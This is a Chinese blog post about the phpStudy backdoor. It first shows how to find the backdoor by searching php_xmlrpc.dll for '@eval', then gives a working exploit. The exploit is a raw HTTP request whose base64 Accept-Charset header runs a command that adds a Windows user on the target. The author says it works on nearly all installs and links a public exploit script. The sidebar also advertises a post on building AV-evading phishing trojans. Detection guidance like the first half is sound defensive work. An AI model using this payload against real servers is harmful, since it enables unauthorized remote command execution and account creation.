suosuo

您现在的位置是:网站首页> 网络安全 应急响应

phpstudy后门漏洞检测及利用

kn1fe2019-09-25 16:40:11应急响应人已围观

简介PHP study软件存在后门,能够命令执行。

PHPstudy后门检测

phpstudy被曝存在后门,可以在以下路径检测是否存在后门

php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll

或者

PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dl

用记事本打开此文件,然后搜索@eval字样,如若存在,则说明你的phpstudy存在漏洞。

PHPstudy后门漏洞利用

基本上是通杀。。。

附上POC 

GET / HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding:gzip,deflate
Accept-Charset: c3lzdGVtKCduZXQgdXNlciBhIGEgL2FkZCcpOw==(替换这里base64加密)
Cookie: UM_distinctid=16ae380e49f27e-0987ab403bca49-3c604504-1fa400-16ae380e4a011b; CNZZDATA3801251=cnzz_eid%3D1063495559-1558595034-%26ntime%3D1559102092; CNZZDATA1670348=cnzz_eid%3D213162126-1559207282-%26ntime%3D1559207282
Connection: close
我在GitHub也找到了别人写的脚本,附上链接

https://github.com/NS-Sp4ce/PHPStudy_BackDoor_Exp

成果截图

很赞哦!()

上一篇:应急响应安全事件分析流程

下一篇:windows失陷主机检测-应急响应

kn1fe

kn1fe(共5篇文章)


新浪微博
腾讯微博
GitHub
邮箱

点击排行

利用winrar自解压捆版payload制作免杀钓鱼木马

本栏推荐

利用winrar自解压捆版payload制作免杀钓鱼木马

标签云

猜你喜欢